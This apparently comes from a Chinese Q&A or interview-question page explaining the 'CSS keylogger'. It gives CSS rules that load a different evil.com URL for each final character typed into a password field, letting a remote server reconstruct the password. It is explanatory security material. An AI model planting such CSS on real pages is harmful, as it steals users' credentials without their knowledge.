使用纯css能否监控到用户的一些信息？怎么实现？

使用纯css能否监控到用户的一些信息？怎么实现？

可以，著名的css keylogger：

input[type="password"][value$="a"] {  background-image: url("http://evil.com/api/a");}input[type="password"][value$="b"] {  background-image: url("http://evil.com/api/b");}input[type="password"][value$="c"] {  background-image: url("http://evil.com/api/c");}

当用户输入密码时，这段css会请求用户输入的字符对应的资源，远端服务器通过监视请求资源的顺序从而推断用户的密码。所以css也不是绝对安全的